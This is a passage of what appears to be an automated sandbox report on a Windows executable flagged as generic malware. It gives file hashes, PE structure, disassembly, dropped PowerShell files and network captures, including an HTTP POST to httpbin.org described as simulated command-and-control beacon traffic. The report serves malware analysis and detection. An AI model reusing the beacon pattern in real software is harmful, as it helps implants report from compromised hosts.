Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1748
Entropy (8bit):	5.67328384075777
Encrypted:	false
SSDEEP:	48:mSU4xymdajm9qr9tz4RIoUl8NLHzSPx5jl+yPW9SGxY:bHxvJ9qrfIfSKLHmP3ZvW9S0Y
MD5:	BA880FBC66C20013FA9E2257BE5FA412
SHA1:	CC858FB928A74C8089E58FCEECEADC0302A0E26C
SHA-256:	80E55F22AEAE1882307D6CC01697267EC80E7E55605E021343CA00085130871A
SHA-512:	9949E566F7B38DDD295FAD1922AC208781A062F50B6A3F769914402128EEDA3C327BE8CA557C39923A4BD78E0C569C7174D427F71CC374A02D3D6A8752B89DBF
Malicious:	false
Reputation:	low
Preview:	@...e...................R.@...............P.....................@...............M6.]..O....PI.&$.......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13to5vl5.qjb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ar5cncj.aol.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agnoeq0v.q4h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aio0ubsg.ixi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfpavd4s.aei.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlvipkkl.bcf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmcuaaj5.oof.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnmsewhx.qgh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx4dkhw4.z0q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp4ibco5.rsx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmlrqvwh.mlt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfakr5b5.h23.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	827
Entropy (8bit):	4.91941310075936
Encrypted:	false
SSDEEP:	12:QnCNUfrmyXkftExIMFbQDfFwUVRB2DyLWb2RKJFtHwih00NmCCNUfrAyXkfX361:oCwXk1EmMFSfdVn2DyvRwPh2uXkA
MD5:	B6C3EFF040D9C6E2613194E0F9FBC028
SHA1:	ABC67E74C7B0F65F061A88FC5AB5AA9AE027EAB9
SHA-256:	A8C02254E7B15B2983B84CCDE74BE92CAC1A5444788489E803D9E9E2FA875CA3
SHA-512:	D7BFC902DC404EC65FBDCEE0C8549051DD44B6D55585139EA9A596470659D69E48CE107476F033C23EEFFEFD3CC520A75887235C4773DAD3291E6224062993EE
Malicious:	false
Preview:	....args : ..data : {.. "d": "This is beacon traffic, which could contain compromised host information, some identifier, or .. some value to indicate a healthy implant to the C2 server, among other things.".. }..files : ..form : ..headers : @{Content-Length=190; Content-Type=application/json; Host=httpbin.org; User-Agent=Mozilla/5.0 (Windows NT .. 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36; .. X-Amzn-Trace-Id=Root=1-67047b9a-0aa087bb2f0114901a6ce69b}..json : @{d=This is beacon traffic, which could contain compromised host information, some identifier, or some value .. to indicate a healthy implant to the C2 server, among other things.}..origin : 8.46.123.33..url : http://httpbin.org/post........

Static File Info

General

File type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.032335834178712
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
File size:	1'817'088 bytes
MD5:	ec294b697f39b8ec154b86e91be6957e
SHA1:	ae719714439fe37811aea360ed42a586bd6e3353
SHA256:	704dc6619a90ff82c8977bd4dd7167830d4de83bd7eb46b511105a9d33048a1f
SHA512:	d983826b141fe743d651b15b84dc42c4f9607c69e3b0f2b3d9e5b6c2706b4d18d98ce0bedb97132d1f9bda2a5101ac1cb0f20246b28181cd6669c59c22330e20
SSDEEP:	49152:c4C4oROYDCFITrb/TbvO90d7HjmAFd4A64nsfJd4kESaCH49SgsV7VdoZPD1:LWC9E
TLSH:	3A85170BBC9154B9D4AAE2318D7A92517A30BC980F3163D73B90B3F92F72BD45A75324
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."..................;........@...............................!...........`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x463b80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	f0ea7b7844bbc5bfa9bb32efdcea957c

Entrypoint Preview

Instruction
jmp 00007F5234844CB0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
dec eax
sub esp, 30h
dec ecx
mov ebp, ecx
dec ecx
mov edi, eax
dec eax
mov edx, dword ptr [001AA5EBh]
dec eax
mov edx, dword ptr [edx]
dec eax
cmp edx, 00000000h
jne 00007F523484891Eh
dec eax
mov eax, 00000000h
jmp 00007F52348489E3h
dec eax
mov edx, dword ptr [edx]
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x213000	0x490	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x219000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x214000	0x39c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19f160	0x148	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc8911	0xc8a00	4e90e020acbf9574db048f88b58286d5	False	0.4581617503894081	data	6.194469783424182	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xca000	0xd4280	0xd4400	1fc4ae5d4d939272bc0dc1da793555b6	False	0.41265459363957596	data	5.3416826243744415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19f000	0x730d0	0x1a000	254370b485efbd355b00b63c46d8386c	False	0.3918269230769231	data	4.535865654283707	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x213000	0x490	0x600	093b9193a42d6e39101aa099f9fcc7a0	False	0.3359375	data	3.615015008618036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x214000	0x39c8	0x3a00	2f5c4ae875136b3d5c1623ea220d985d	False	0.3428744612068966	data	5.416481020164559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x218000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x219000	0x3d8	0x400	1201af8e5390efe56129b8e1bee19933	False	0.421875	data	3.2553673489020145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x219058	0x37c	data	English	United States	0.4484304932735426

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 02:22:06.039875984 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:06.045070887 CEST	80	49730	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:06.045203924 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:06.045519114 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:06.050348997 CEST	80	49730	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:06.392635107 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:06.397784948 CEST	80	49730	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:27.406280994 CEST	80	49730	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:27.406516075 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:27.422267914 CEST	49730	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:27.427036047 CEST	80	49730	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:30.474215984 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:30.479027033 CEST	80	49737	107.22.40.220	192.168.2.4
Oct 8, 2024 02:22:30.479101896 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:30.479440928 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:30.484853983 CEST	80	49737	107.22.40.220	192.168.2.4
Oct 8, 2024 02:22:30.834980965 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:30.840146065 CEST	80	49737	107.22.40.220	192.168.2.4
Oct 8, 2024 02:22:30.951471090 CEST	80	49737	107.22.40.220	192.168.2.4
Oct 8, 2024 02:22:30.991059065 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:31.086411953 CEST	80	49737	107.22.40.220	192.168.2.4
Oct 8, 2024 02:22:31.127690077 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:31.203514099 CEST	49737	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:22:44.286771059 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:44.291938066 CEST	80	49738	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:44.292028904 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:44.330173969 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:44.335047007 CEST	80	49738	44.207.250.251	192.168.2.4
Oct 8, 2024 02:22:44.680955887 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:22:44.685733080 CEST	80	49738	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:05.694392920 CEST	80	49738	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:05.694467068 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:05.696194887 CEST	49738	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:05.701045036 CEST	80	49738	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:10.336277962 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:10.423738003 CEST	80	49817	107.22.40.220	192.168.2.4
Oct 8, 2024 02:23:10.423871994 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:10.424215078 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:10.429218054 CEST	80	49817	107.22.40.220	192.168.2.4
Oct 8, 2024 02:23:10.780384064 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:10.785350084 CEST	80	49817	107.22.40.220	192.168.2.4
Oct 8, 2024 02:23:10.888443947 CEST	80	49817	107.22.40.220	192.168.2.4
Oct 8, 2024 02:23:10.936459064 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:11.019493103 CEST	80	49817	107.22.40.220	192.168.2.4
Oct 8, 2024 02:23:11.074454069 CEST	49817	80	192.168.2.4	107.22.40.220
Oct 8, 2024 02:23:26.299361944 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:26.304187059 CEST	80	49911	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:26.304259062 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:26.304541111 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:26.309437990 CEST	80	49911	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:26.655222893 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:26.660089016 CEST	80	49911	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:47.689476013 CEST	80	49911	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:47.689650059 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:47.691224098 CEST	49911	80	192.168.2.4	44.207.250.251
Oct 8, 2024 02:23:47.696068048 CEST	80	49911	44.207.250.251	192.168.2.4
Oct 8, 2024 02:23:53.970814943 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:53.975780010 CEST	80	50007	34.236.15.216	192.168.2.4
Oct 8, 2024 02:23:53.976078987 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:53.976160049 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:53.980981112 CEST	80	50007	34.236.15.216	192.168.2.4
Oct 8, 2024 02:23:54.323323011 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:54.328545094 CEST	80	50007	34.236.15.216	192.168.2.4
Oct 8, 2024 02:23:54.448137045 CEST	80	50007	34.236.15.216	192.168.2.4
Oct 8, 2024 02:23:54.495031118 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:54.579260111 CEST	80	50007	34.236.15.216	192.168.2.4
Oct 8, 2024 02:23:54.620093107 CEST	50007	80	192.168.2.4	34.236.15.216
Oct 8, 2024 02:23:54.641596079 CEST	50007	80	192.168.2.4	34.236.15.216

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 02:22:30.463541031 CEST	56630	53	192.168.2.4	1.1.1.1
Oct 8, 2024 02:22:30.470567942 CEST	53	56630	1.1.1.1	192.168.2.4
Oct 8, 2024 02:23:53.958506107 CEST	53050	53	192.168.2.4	1.1.1.1
Oct 8, 2024 02:23:53.967540026 CEST	53	53050	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 02:22:30.463541031 CEST	192.168.2.4	1.1.1.1	0x7291	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 02:23:53.958506107 CEST	192.168.2.4	1.1.1.1	0xc1d5	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 02:22:30.470567942 CEST	1.1.1.1	192.168.2.4	0x7291	No error (0)	httpbin.org	107.22.40.220	A (IP address)	IN (0x0001)	false
Oct 8, 2024 02:22:30.470567942 CEST	1.1.1.1	192.168.2.4	0x7291	No error (0)	httpbin.org	34.236.15.216	A (IP address)	IN (0x0001)	false
Oct 8, 2024 02:23:53.967540026 CEST	1.1.1.1	192.168.2.4	0xc1d5	No error (0)	httpbin.org	34.236.15.216	A (IP address)	IN (0x0001)	false
Oct 8, 2024 02:23:53.967540026 CEST	1.1.1.1	192.168.2.4	0xc1d5	No error (0)	httpbin.org	107.22.40.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

44.207.250.251

httpbin.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.207.250.251	80	7644	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
